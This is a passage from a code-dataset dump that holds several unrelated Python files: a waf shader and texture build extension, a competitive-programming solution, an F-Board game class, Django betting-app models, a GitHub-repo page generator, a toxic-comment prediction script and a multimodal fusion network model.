Enjoy!\")\r\n","sub_path":"Day15-Coffee-Machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"482527821","text":"import sys, os\nimport Task, TaskGen\nfrom TaskGen import extension\n\ndef configure(conf):\n conf.find_file('texc.py', var='TEXC', mandatory = True)\n conf.find_file('glslvc', var='GLSLVC', mandatory = True)\n conf.find_file('glslfc', var='GLSLFC', mandatory = True)\n\nTask.simple_task_type('texture', 'python ${TEXC} ${SRC} -o ${TGT}',\n color='PINK',\n after='proto_gen_py',\n before='cc cxx',\n shell=True)\n\n@extension('.png .jpg')\ndef png_file(self, node):\n texture = self.create_task('texture')\n texture.set_inputs(node)\n out = node.change_ext('.texturec')\n texture.set_outputs(out)\n\nTask.simple_task_type('vertexprogram', '${GLSLVC} ${SRC} ${TGT}',\n color='PINK',\n shell=True)\n\n@extension('.vp')\ndef vp_file(self, node):\n obj_ext = '.vpc'\n program = self.create_task('vertexprogram')\n program.set_inputs(node)\n out = node.change_ext(obj_ext)\n program.set_outputs(out)\n\nTask.simple_task_type('fragmentprogram', '${GLSLFC} ${SRC} ${TGT}',\n color='PINK',\n shell=True)\n\n@extension('.fp')\ndef fp_file(self, node):\n obj_ext = '.fpc'\n program = self.create_task('fragmentprogram')\n program.set_inputs(node)\n out = node.change_ext(obj_ext)\n program.set_outputs(out)\n","sub_path":"engine/graphics/src/waf_graphics.py","file_name":"waf_graphics.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"614988220","text":"N, M, A, B = map(int, input().split())\nfor i in range(M):\n if N <= A:\n N += B\n t = int(input())\n N -= t\n if N < 0:\n print(i + 1)\n break\nelse:\n print(\"complete\")","sub_path":"ARC/ARC010/arc010a.py","file_name":"arc010a.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"433345552","text":"# Name: Kyle Bingman\n# Date: 3/8/2020\n# Description: Enables a game of F-Board to be played by two players.\n\nclass FBoard:\n \"\"\"Sets up the board and required moves for a game of F-Board\"\"\"\n\n def __init__(self):\n \"\"\"Establishes and initializes the board and current state of the game\"\"\"\n self._game_board = [[\"x\", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \"o\"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \"o\", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \"o\", \" \", \"o\"]]\n self._game_state = \"UNFINISHED\"\n self._x_location = [0, 0]\n\n def win_check(self):\n \"\"\"Performs Needed Checks to See if the Game Has Been Won\"\"\"\n\n # Generate Allowable X Moves for Later\n x_check_position = self._x_location\n x_move_options = []\n\n # Add 1 to Both\n move_option_win_check = [x + 1 for x in x_check_position]\n x_move_options.append(move_option_win_check)\n\n # Subtract 1 from Both\n move_option_win_check = [x - 1 for x in x_check_position]\n x_move_options.append(move_option_win_check)\n\n # +1 / - 1\n move_option_win_check2 = []\n move_option_win_check2.append(x_check_position[0] + 1)\n 
move_option_win_check2.append(x_check_position[1] - 1)\n x_move_options.append(move_option_win_check2)\n\n # - 1 / + 1\n move_option_win_check3 = []\n move_option_win_check3.append(x_check_position[0] - 1)\n move_option_win_check3.append(x_check_position[1] + 1)\n x_move_options.append(x_check_position)\n #print(\"Win Check - Allowed X Moves:\", x_move_options)\n\n # Check of X Has Won\n if self._game_board[7][7] == \"x\":\n self._game_state = \"X_WON\"\n return True\n\n # Check if No Legal Moves for X / If O Has Won\n o_checks = []\n x_is_done = 0\n\n # Sees if the X Moves Are In Range\n for coordinate in range(4):\n x_coord = x_move_options[coordinate][0]\n y_coord = x_move_options[coordinate][1]\n\n if x_coord >= 0 and x_coord <= 7:\n if y_coord >= 0 and y_coord <= 7:\n o_checks.append([x_coord, y_coord])\n #print(o_checks)\n elif y_coord <= 0 or y_coord >= 7:\n x_is_done += 1\n\n elif x_coord <= 0 or x_coord >= 7:\n if y_coord <= 0 or y_coord >= 7:\n x_is_done += 1\n #print(\"Out of Bounds:\", x_is_done)\n\n # Sees if the X Move Is To A Space With An O Already\n for coordinate in range(len(o_checks)):\n x_coord2 = o_checks[coordinate][0]\n y_coord2 = o_checks[coordinate][1]\n\n if self._game_board[x_coord2][y_coord2] == \"o\":\n x_is_done += 1\n #print(\"Space is Filled:\", x_is_done)\n\n #print(\"X Out of Options Count\", x_is_done)\n\n # Figures Out if X Can't Move Anywhere Else\n if x_is_done == 4:\n self._game_state = \"O_WON\"\n #print(game_state)\n\n # Otherwise Game Unfinished\n if self._game_state == \"UNFINISHED\":\n return True\n\n def move_x(self, row_x, column_x):\n \"\"\"Moves the X Piece\"\"\"\n\n current_x_pos = self._x_location\n desired_move = [row_x, column_x]\n allowed_moves = []\n\n # Check if Game Has Already Been Won\n if self._game_state == \"X_WON\" or self._game_state == \"O_WON\":\n #print(\"Test: Quitting Now - Game Over\")\n return False\n\n # Check if O is Occupying Space\n if self._game_board[row_x][column_x] == \"o\":\n #print(\"Space is occupied by O\")\n return False\n\n if row_x < 0 or row_x > 7 or column_x < 0 or column_x > 7:\n return False\n\n # Check If Move Is Allowed and Make Move If It Is\n else:\n #Generate Allowed Moves\n # Add 1 to Both\n move_option = [x + 1 for x in current_x_pos]\n allowed_moves.append(move_option)\n\n # Subtract 1 from Both\n move_option = [x -1 for x in current_x_pos]\n allowed_moves.append(move_option)\n\n # +1 / - 1\n move_option2 = []\n move_option2.append(current_x_pos[0] + 1)\n move_option2.append(current_x_pos[1] - 1)\n allowed_moves.append(move_option2)\n\n # - 1 / + 1\n move_option3 = []\n move_option3.append(current_x_pos[0] - 1)\n move_option3.append(current_x_pos[1] + 1)\n allowed_moves.append(move_option3)\n #print(\"Allowed Moves:\", allowed_moves)\n\n # Check if Desired Move in Allowed Moves\n #print(\"Desired Move:\", desired_move)\n if desired_move in allowed_moves:\n #print(\"Move is Allowed\")\n\n # Clear Previous X Position\n self._game_board[self._x_location[0]][self._x_location[1]] = \" \"\n\n # Make Move\n self._game_board[row_x][column_x] = \"x\"\n\n # Update Current X Position\n current_x_pos = [row_x, column_x]\n self._x_location = current_x_pos\n #print(\"New X Position Is:\", current_x_pos)\n #print(\"self._x_location is now\", self._x_location)\n #print(self._game_board)\n\n # Clear Allowed Moves\n allowed_moves.clear()\n\n # Check for Win\n self.win_check()\n return True\n\n else:\n #print(\"Move is Not Allowed\")\n return False\n\n def move_o(self, row1_o, column1_o, row2_o, column2_o):\n 
\"\"\"Moves the O Piece\"\"\"\n\n stated_current_o = [row1_o, column1_o]\n desired_o_location = [row2_o, column2_o]\n allowed_o_moves = []\n\n # Check if Game Already Won\n if self._game_state == \"X_WON\" or self._game_state == \"O_WON\":\n #print(\"Test: Quitting Now - Game Over\")\n return False\n\n if row2_o < 0 or row2_o > 7 or column2_o < 0 or column2_o > 7:\n return False\n\n # Check to make sure there's an O to move\n if self._game_board[row1_o][column1_o] != \"o\":\n #print(\"Test: Not an O there to move\")\n return False\n\n # Check if Desired Space to Move is Occupied\n if self._game_board[row2_o][column2_o] == \"o\" or self._game_board[row2_o][column2_o] == \"x\":\n #print(\"Space is occupied already by an X or O\")\n return False\n\n # Check if Move is Allowed and Make Move If it Is\n else:\n # Generate Allowed Moves for O\n # Subtract 1 from Both\n move_option_o = [x - 1 for x in stated_current_o]\n allowed_o_moves.append(move_option_o)\n #print(allowed_o_moves)\n\n # +1 / - 1\n move_option_o2 = []\n move_option_o2.append(stated_current_o[0] + 1)\n move_option_o2.append(stated_current_o[1] - 1)\n allowed_o_moves.append(move_option_o2)\n #print(allowed_o_moves)\n\n # - 1 / + 1\n move_option_o3 = []\n move_option_o3.append(stated_current_o[0] - 1)\n move_option_o3.append(stated_current_o[1] + 1)\n allowed_o_moves.append(move_option_o3)\n #print(\"Allowed Moves:\", allowed_o_moves)\n\n # Check if Desired Move in Allowed Moves\n #print(\"Desired Move:\", desired_o_location)\n if desired_o_location in allowed_o_moves:\n #print(\"Move is Allowed\")\n\n # Clear Previous 0 Position\n self._game_board[stated_current_o[0]][stated_current_o[1]] = \" \"\n\n # Make Move\n self._game_board[row2_o][column2_o] = \"o\"\n #print(self._game_board)\n\n # Clear Allowed Moves\n allowed_o_moves.clear()\n #print(allowed_o_moves)\n\n # Check for Win\n self.win_check()\n return True\n\n def get_game_state(self):\n \"\"\"Returns the current state of the game: UNFINISHED, X_WON, or O_WON\"\"\"\n return self._game_state","sub_path":"FBoard.py","file_name":"FBoard.py","file_ext":"py","file_size_in_byte":8563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"576218399","text":"from django.db import models\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nimport datetime\nfrom django.utils import timezone\n\n# Create your models here.\n\n\n# User model from django \n\nclass Category(models.Model):\n cat = models.CharField(max_length=100)\n def __str__(self):\n return self.cat\n\nclass Match(models.Model):\n match = models.CharField(max_length=200)\n cat = models.ForeignKey(Category)\n match_date=models.DateTimeField(verbose_name='match date/time',auto_now_add=True)\n finished=models.NullBooleanField(default=False)#true=yes, false=no\n def __str__(self):\n return self.match\n\nclass Image(models.Model):\n image=models.ImageField(upload_to='static',null=True)#upload to?\n match=models.ForeignKey(Match)\n\nclass Offer(models.Model):\n offer = models.CharField(max_length=200)\n match= models.ForeignKey(Match,null=True)\n post_date = models.DateTimeField('date posted',auto_now_add=True)#,auto_now_add=True)\n odds = models.FloatField(null=True, blank=True,verbose_name=\"odds\")\n result=models.NullBooleanField()#true=win, false=loss, unknown\n def __str__(self):\n return self.offer\n\nclass Bet(models.Model):\n user = models.ForeignKey(User)\n offer= models.ForeignKey(Offer)\n amt = models.FloatField(null=True, 
blank=True,verbose_name=\"bet amount mBtC\")\n submitted=models.NullBooleanField()#true=submitted, false=still open\n parlay=models.NullBooleanField(default=False)#true=win, false=loss\n paid=models.NullBooleanField(default=False)\n\nclass Parlay(models.Model):\n user = models.ForeignKey(User)\n amt = models.FloatField(null=True, blank=True,verbose_name=\"Parlay amount mBtC\")\n bet_list = models.CommaSeparatedIntegerField(max_length=250)\n paid=models.NullBooleanField(default=False)\n #do i need submitted?","sub_path":"myapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"352757274","text":"#!/usr/bin/python\n# coding: utf-8 -*-\n\n#\n# GNU General Public License v3.0+\n#\n# Copyright 2020 TiTom73\n#\n# Licensed under the Apache License, Version 2.0 (the 'License');\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http: //www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an 'AS IS' BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport os\nimport sys\nimport requests\nfrom jinja2 import Environment, FileSystemLoader\n\nGH_API_ENDPOINT = 'https://api.github.com/users/aristanetworks/repos?per_page=100'\nJSON_FIELDS = { 'name':'project_name', 'description':'description', 'html_url':'homepage', 'updated_at': 'last_commit'}\nTEMPLATE_MARKDOWN = 'page.md.j2'\nOUTPUT_FILE = '../docs/arista.md'\nPAGE_TITLE= 'Arista Networks'\nORGANISATION_NAME = 'aristanetworks'\nORGANISATION_URL = 'https://github.com/' + ORGANISATION_NAME\n\ndef get_gh_api(url):\n \"\"\"\n get_gh_api Extract information using GET\n\n Collect Github data from their public API\n Current version does not support authentication\n\n Parameters\n ----------\n url : string\n Github API string to get.\n\n Returns\n -------\n json\n Response from GH.\n \"\"\"\n response = requests.get(url)\n if response.status_code == requests.codes.ok:\n return response.json()\n return {}\n\ndef extract_fields(gh_json, fields):\n \"\"\"\n extract_fields Extract field from GH API data\n\n Extract fields from GH API data and standardize name of keys\n\n Parameters\n ----------\n gh_json : json\n JSON content from Github\n fields : dict\n A list of fields to extract and the name we want to use as standard.\n \"\"\"\n data = list()\n for entry in gh_json:\n cell = dict()\n for field in fields:\n cell[fields[field]] = entry[field]\n data.append(cell)\n return data\n\n\nif __name__ == '__main__':\n data = get_gh_api(url=GH_API_ENDPOINT)\n projects = extract_fields(gh_json=data, fields=JSON_FIELDS)\n root = os.path.dirname(os.path.abspath(__file__))\n env = Environment( loader = FileSystemLoader(root) )\n env.trim_blocks = True\n env.lstrip_blocks = True\n env.rstrip_blocks = True\n template = env.get_template(TEMPLATE_MARKDOWN)\n output = template.render(projects=projects, organisation_name=ORGANISATION_NAME, organisation_url=ORGANISATION_URL, page_title=PAGE_TITLE)\n filename = os.path.join(root, OUTPUT_FILE)\n with open(filename, 'w') as fh:\n fh.write(output)\n\n 
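# page rendered and written successfully; exit with a clean status\n 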
sys.exit(0)\n","sub_path":".github/aristanetworks.py","file_name":"aristanetworks.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"45089017","text":"#!/usr/bin/env python3\n\nprint('Product.destroy_all\\n\\nProduct.create!([')\nwith open('ProductList.csv', 'r') as infile:\n first = True\n output = ''\n for line in infile:\n if first:\n if line[0] == '\\ufeff': # Mac Excel weirdness\n line = line[1:]\n else:\n print('},')\n first = False\n\n fields = line.split(',')\n name = fields[0].strip('$')\n price = float(fields[1].strip('$'))\n cogs = price * 0.65 * 0.45 # 45% discount leaves 55% gross margin\n lb = '{'\n print(f'{lb}\\n name:\"{name}\",')\n print(f' price:{price:.2f},')\n print(f' cogs:{cogs:.2f}')\n print('}])')\n\n\n\n","sub_path":"productSeeder.py","file_name":"productSeeder.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"236012396","text":"\"\"\"\n模型预测脚本\n\"\"\"\nfrom os.path import join, exists\nfrom json import dumps, loads\nfrom time import time\n\nimport torch\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import roc_auc_score\n\nfrom allennlp.commands.predict import _PredictManager\nfrom allennlp.data.token_indexers import SingleIdTokenIndexer\n\nfrom library.modules import components\nfrom library.models.bigru import BiGRU\n\ndef test_to_json( in_file, out_file ):\n \"\"\"\n 将处理后的测试集转成json格式,便于Predictor使用\n \"\"\"\n json_lines = []\n with open( in_file, 'r' ) as f:\n for i, line in enumerate( f ) :\n if i == 0:\n continue\n test_id, tokens = line.strip( \"\\n\" ).split( ',' )\n d = {\"test_id\": test_id, \"tokens\": tokens}\n json_lines.append( dumps( d ) + \"\\n\" )\n with open( out_file, 'w' ) as g:\n g.writelines( json_lines )\n\ndef combine_json_to_submission( json_results, sample_submission, submission_file ):\n \"\"\"\n 将k-fold CV模型在测试集上的结果简单平均,得到最终提交结果\n \"\"\"\n results = {}\n for json_result in json_results:\n with open( json_result, \"r\" ) as f:\n for line in f:\n d = loads( line.strip( \"\\n\" ) )\n k = d[\"test_id\"]; v = np.array( d[\"probs\"] )\n results[k] = results.get( k, 0 ) + v\n\n output_lines = []\n num_results = len( json_results )\n with open( sample_submission, \"r\" ) as f:\n for i, line in enumerate( f ):\n if i == 0:\n output_lines.append( line )\n continue\n test_id = line.strip( \"\\n\" ).split( \",\" )[0]\n scores = \",\".join( [\"%f\" % ( s / num_results ) for s in results[test_id]] )\n output_lines.append( test_id + \",\" + scores + \"\\n\" )\n \n with open( submission_file, \"w\" ) as f:\n f.writelines( output_lines )\n\ndef get_score( pred_file, true_file ):\n \"\"\"\n 由于比赛结束后公布了完整测试集上的标签,因此不通过提交也能得出分数(因为提交次数有限制)\n 但是由于public与private LB混在一起且具体划分未知,所以与kaggle网站上的分数比较没有参考价值,仅限于离线比较\n \"\"\"\n pred = pd.read_csv( pred_file ).values[:,1:].astype( np.float64 )\n true = pd.read_csv( true_file ).values[:,1:].astype( np.int8 )\n scored_index = true[:,0] != -1\n pred_scored = pred[scored_index,:]\n true_scored = true[scored_index,:]\n score = roc_auc_score( true_scored, pred_scored )\n return score\n\nif __name__ == \"__main__\":\n\n begin = time()\n base_dir = \"/home/ubuntu/MyFiles/nlp_data/toxic\"\n submission_dir = join( base_dir, \"submission\" )\n checkpoint_dir = \"/home/ubuntu/MyFiles/toxic_comment/checkpoint\"\n input_file = join( submission_dir, \"test_clean.jsonl\" )\n\n vocab_dir = join( checkpoint_dir, \"vocabulary\" )\n 
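# rebuild the training-time setup: the vocabulary and embedding matrix must match the checkpoints\n 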
vocab = components.create_or_load_vocab( vocab_dir, None ) # 强制从ckpt中载入字典\n\n embedding_matrix_file = join( base_dir, \"exp\", \"embedding_matrix.npy\" )\n np_data = np.load( embedding_matrix_file )\n embedding_matrix = torch.from_numpy( np_data )\n model = BiGRU( vocab = vocab, embedding_matrix = embedding_matrix )\n\n reader = components.ToxicDatasetReader()\n\n cuda_device = 0 if torch.cuda.is_available() else -1\n\n num_fold = 10\n for i in range( num_fold ):\n # load model and put it on device\n model_checkpoint = join( checkpoint_dir, \"%d/model.th\" % i )\n with open( model_checkpoint, \"rb\" ) as f:\n model.load_state_dict( torch.load( f ) )\n if cuda_device > -1:\n model.cuda( cuda_device )\n \n # construct predictor and manager\n output_file = join( submission_dir, \"%d.jsonl\" % i )\n predictor = components.ToxicPredictor( model, reader )\n manager = _PredictManager( \n predictor = predictor, \n input_file = input_file,\n output_file = output_file,\n batch_size = 32,\n print_to_console = False,\n has_dataset_reader = False \n )\n # predict and write into files\n manager.run()\n\n json_results = [join( submission_dir, \"%d.jsonl\" % i ) for i in range( num_fold )]\n sample_submission = join( submission_dir, \"sample_submission.csv\" )\n submission_file = join( submission_dir, \"submission.csv\" )\n combine_json_to_submission( json_results, sample_submission, submission_file )\n\n true_file = join( submission_dir, \"test_labels.csv\" )\n score = get_score( submission_file, true_file )\n\n consume = ( time() - begin ) / 60 # 大约消耗30min\n print( \"AUC: %f, predict consumes %.2f min\" % ( score, consume ) )\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"571994042","text":"import numpy as np\nseed = 123\nnp.random.seed(seed)\nimport random\nimport torch\ntorch.manual_seed(seed)\ntorch.cuda.manual_seed(seed)\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable, grad\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\nimport h5py\nimport time\nimport argparse\nimport time\nimport json, os, h5py\n\nfrom keras.models import Model\nfrom keras.layers import Input\nfrom keras.layers.embeddings import Embedding\n\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.metrics import accuracy_score, f1_score\n\nimport sys\n\n\nclass MFN(nn.Module):\n\tdef __init__(self,d_l, d_a, d_v, h_l, h_a, h_v, memsize, windowsize, h_att1, h_att2, h_gamma1, h_gamma2, h_out, d_fusion, beta, M=3):\n\t\tsuper(MFN, self).__init__()\n\t\t[self.d_l,self.d_a,self.d_v] = [d_l, d_a, d_v]\n\t\t[self.dh_l,self.dh_a,self.dh_v] = [h_l, h_a, h_v]\n\t\ttotal_h_dim = self.dh_l+self.dh_a+self.dh_v\n\t\tself.mem_dim = memsize\n\t\twindow_dim = windowsize\n\t\toutput_dim = 1\n\t\tattInShape = total_h_dim*window_dim\n\t\tgammaInShape = attInShape+self.mem_dim\n\t\tself.d_fusion = d_fusion\n\t\tfinal_out = self.d_fusion+self.mem_dim\n\t\tatt1_dropout = 0\n\t\tatt2_dropout = 0\n\t\tgamma1_dropout = 0\n\t\tgamma2_dropout = 0\n\t\tout_dropout = 0\n\n\t\tself.lstm_l = nn.LSTMCell(self.d_l, self.dh_l)\n\t\tself.lstm_a = nn.LSTMCell(self.d_a, self.dh_a)\n\t\tself.lstm_v = nn.LSTMCell(self.d_v, self.dh_v)\n\n\t\tself.att1_fc1 = nn.Linear(attInShape, h_att1)\n\t\tself.att1_fc2 = nn.Linear(h_att1, 
attInShape)\n\t\tself.att1_dropout = nn.Dropout(att1_dropout)\n\n\t\tself.att2_fc1 = nn.Linear(attInShape, h_att2)\n\t\tself.att2_fc2 = nn.Linear(h_att2, self.mem_dim)\n\t\tself.att2_dropout = nn.Dropout(att2_dropout)\n\n\t\tself.gamma1_fc1 = nn.Linear(gammaInShape, h_gamma1)\n\t\tself.gamma1_fc2 = nn.Linear(h_gamma1, self.mem_dim)\n\t\tself.gamma1_dropout = nn.Dropout(gamma1_dropout)\n\n\t\tself.gamma2_fc1 = nn.Linear(gammaInShape, h_gamma2)\n\t\tself.gamma2_fc2 = nn.Linear(h_gamma2, self.mem_dim)\n\t\tself.gamma2_dropout = nn.Dropout(gamma2_dropout)\n \n\t\tself.fusion_l = nn.Linear(self.dh_l, self.d_fusion)\n\t\tself.fusion_a = nn.Linear(self.dh_a, self.d_fusion)\n\t\tself.fusion_v = nn.Linear(self.dh_v, self.d_fusion)\t\t\n\n\t\tself.out_fc1 = nn.Linear(final_out, h_out)\n\t\tself.out_fc2 = nn.Linear(h_out, output_dim)\n\t\tself.out_dropout = nn.Dropout(out_dropout)\n\t\tself.beta = beta\n\t\tself.M = M\n\tdef forward(self,x):\n\t\tx_l = x[:,:,:self.d_l]\n\t\tx_a = x[:,:,self.d_l:self.d_l+self.d_a]\n\t\tx_v = x[:,:,self.d_l+self.d_a:]\n\t\t# x is t x n x d\n\t\tn = x.shape[1]\n\t\tt = x.shape[0]\n\t\tself.h_l = torch.zeros(n, self.dh_l).cuda()\n\t\tself.h_a = torch.zeros(n, self.dh_a).cuda()\n\t\tself.h_v = torch.zeros(n, self.dh_v).cuda()\n\t\tself.c_l = torch.zeros(n, self.dh_l).cuda()\n\t\tself.c_a = torch.zeros(n, self.dh_a).cuda()\n\t\tself.c_v = torch.zeros(n, self.dh_v).cuda()\n\t\tself.mem = torch.zeros(n, self.mem_dim).cuda()\n\t\tall_h_ls = []\n\t\tall_h_as = []\n\t\tall_h_vs = []\n\t\tall_c_ls = []\n\t\tall_c_as = []\n\t\tall_c_vs = []\n\t\tall_mems = []\n\t\tfor i in range(t):\n\t\t\t# prev time step\n\t\t\tprev_c_l = self.c_l\n\t\t\tprev_c_a = self.c_a\n\t\t\tprev_c_v = self.c_v\n\t\t\t# curr time step\n\t\t\tnew_h_l, new_c_l = self.lstm_l(x_l[i], (self.h_l, self.c_l))\n\t\t\tnew_h_a, new_c_a = self.lstm_a(x_a[i], (self.h_a, self.c_a))\n\t\t\tnew_h_v, new_c_v = self.lstm_v(x_v[i], (self.h_v, self.c_v))\n\t\t\t# concatenate\n\t\t\tprev_cs = torch.cat([prev_c_l,prev_c_a,prev_c_v], dim=1)\n\t\t\tnew_cs = torch.cat([new_c_l,new_c_a,new_c_v], dim=1)\n\t\t\tcStar = torch.cat([prev_cs,new_cs], dim=1)\n\t\t\tattention = F.softmax(self.att1_fc2(self.att1_dropout(F.relu(self.att1_fc1(cStar)))),dim=1)\n\t\t\tattended = attention*cStar\n\t\t\tcHat = F.tanh(self.att2_fc2(self.att2_dropout(F.relu(self.att2_fc1(attended)))))\n\t\t\tboth = torch.cat([attended,self.mem], dim=1)\n\t\t\tgamma1 = F.sigmoid(self.gamma1_fc2(self.gamma1_dropout(F.relu(self.gamma1_fc1(both)))))\n\t\t\tgamma2 = F.sigmoid(self.gamma2_fc2(self.gamma2_dropout(F.relu(self.gamma2_fc1(both)))))\n\t\t\tself.mem = gamma1*self.mem + gamma2*cHat\n\t\t\tall_mems.append(self.mem)\n\t\t\t# update\n\t\t\tself.h_l, self.c_l = new_h_l, new_c_l\n\t\t\tself.h_a, self.c_a = new_h_a, new_c_a\n\t\t\tself.h_v, self.c_v = new_h_v, new_c_v\n\t\t\tall_h_ls.append(self.h_l)\n\t\t\tall_h_as.append(self.h_a)\n\t\t\tall_h_vs.append(self.h_v)\n\t\t\tall_c_ls.append(self.c_l)\n\t\t\tall_c_as.append(self.c_a)\n\t\t\tall_c_vs.append(self.c_v)\n\n\t\t# last hidden layer last_hs is n x h\n\t\tlast_h_l = all_h_ls[-1]\n\t\tlast_h_a = all_h_as[-1]\n\t\tlast_h_v = all_h_vs[-1]\n\t\tlast_mem = all_mems[-1]\n \n\t\tlast_hf_l = self.fusion_l(last_h_l)\n\t\tlast_hf_a = self.fusion_a(last_h_a)\n\t\tlast_hf_v = self.fusion_v(last_h_v)\n\t\tp_h_l = self.compute_exp(last_hf_l)\n\t\tp_h_a = self.compute_exp(last_hf_a)\n\t\tp_h_v = self.compute_exp(last_hf_v)\n\t\tlast_hf_lav = torch.pow(p_h_l, self.beta/(self.M-1)) * torch.log(p_h_l) + torch.pow(p_h_a, 
self.beta/(self.M-1)) * torch.log(p_h_a) + torch.pow(p_h_v, self.beta/(self.M-1)) * torch.log(p_h_v)\n\t\tlast_hs = torch.cat([last_hf_lav,last_mem], dim=1)\n\t\toutput = self.out_fc2(self.out_dropout(F.relu(self.out_fc1(last_hs))))\n\t\treturn output\n\t\n\tdef compute_exp(self, logits):\n\t\tlogits_max = torch.max(logits)\n\t\toff_logits = logits - logits_max\n\t\tp = torch.exp(off_logits)\n\t\treturn p\n\n\"\"\"\ndef train_mfn(X_train, y_train, X_valid, y_valid, X_test, y_test, configs):\n\tp = np.random.permutation(X_train.shape[0])\n\tX_train = X_train[p]\n\ty_train = y_train[p]\n\n\tX_train = X_train.swapaxes(0,1)\n\tX_valid = X_valid.swapaxes(0,1)\n\tX_test = X_test.swapaxes(0,1)\n\n\td = X_train.shape[2]\n\th = 128\n\tt = X_train.shape[0]\n\toutput_dim = 1\n\tdropout = 0.5\n\n\t[config,NN1Config,NN2Config,gamma1Config,gamma2Config,outConfig] = configs\n\n\tmodel = MFN(config,NN1Config,NN2Config,gamma1Config,gamma2Config,outConfig)\n\n\toptimizer = optim.Adam(model.parameters(),lr=config[\"lr\"])\n\n\tcriterion = nn.L1Loss()\n\tdevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\tmodel = model.to(device)\n\tcriterion = criterion.to(device)\n\tscheduler = ReduceLROnPlateau(optimizer,mode='min',patience=100,factor=0.5,verbose=True)\n\n\tdef train(model, batchsize, X_train, y_train, optimizer, criterion):\n\t\tepoch_loss = 0\n\t\tmodel.train()\n\t\ttotal_n = X_train.shape[1]\n\t\tnum_batches = total_n / batchsize\n\t\tfor batch in xrange(num_batches):\n\t\t\tstart = batch*batchsize\n\t\t\tend = (batch+1)*batchsize\n\t\t\toptimizer.zero_grad()\n\t\t\tbatch_X = torch.Tensor(X_train[:,start:end]).cuda()\n\t\t\tbatch_y = torch.Tensor(y_train[start:end]).cuda()\n\t\t\tpredictions = model.forward(batch_X).squeeze(1)\n\t\t\tloss = criterion(predictions, batch_y)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\t\t\tepoch_loss += loss.item()\n\t\treturn epoch_loss / num_batches\n\n\tdef evaluate(model, X_valid, y_valid, criterion):\n\t\tepoch_loss = 0\n\t\tmodel.eval()\n\t\twith torch.no_grad():\n\t\t\tbatch_X = torch.Tensor(X_valid).cuda()\n\t\t\tbatch_y = torch.Tensor(y_valid).cuda()\n\t\t\tpredictions = model.forward(batch_X).squeeze(1)\n\t\t\tepoch_loss = criterion(predictions, batch_y).item()\n\t\treturn epoch_loss\n\n\tdef predict(model, X_test):\n\t\tepoch_loss = 0\n\t\tmodel.eval()\n\t\twith torch.no_grad():\n\t\t\tbatch_X = torch.Tensor(X_test).cuda()\n\t\t\tpredictions = model.forward(batch_X).squeeze(1)\n\t\t\tpredictions = predictions.cpu().data.numpy()\n\t\treturn predictions\n\n\tbest_valid = 999999.0\n\trand = random.randint(0,100000)\n\tfor epoch in range(config[\"num_epochs\"]):\n\t\ttrain_loss = train(model, config[\"batchsize\"], X_train, y_train, optimizer, criterion)\n\t\tvalid_loss = evaluate(model, X_valid, y_valid, criterion)\n\t\tscheduler.step(valid_loss)\n\t\tif valid_loss <= best_valid:\n\t\t\t# save model\n\t\t\tbest_valid = valid_loss\n\t\t\tprint epoch, train_loss, valid_loss, 'saving model'\n\t\t\ttorch.save(model, 'temp_models/mfn_%d.pt' %rand)\n\t\telse:\n\t\t\tprint epoch, train_loss, valid_loss\n\n\tprint 'model number is:', rand\n\tmodel = torch.load('temp_models/mfn_%d.pt' %rand)\n\n\tpredictions = predict(model, X_test)\n\tmae = np.mean(np.absolute(predictions-y_test))\n\tprint \"mae: \", mae\n\tcorr = np.corrcoef(predictions,y_test)[0][1]\n\tprint \"corr: \", corr\n\tmult = round(sum(np.round(predictions)==np.round(y_test))/float(len(y_test)),5)\n\tprint \"mult_acc: \", mult\n\tf_score = 
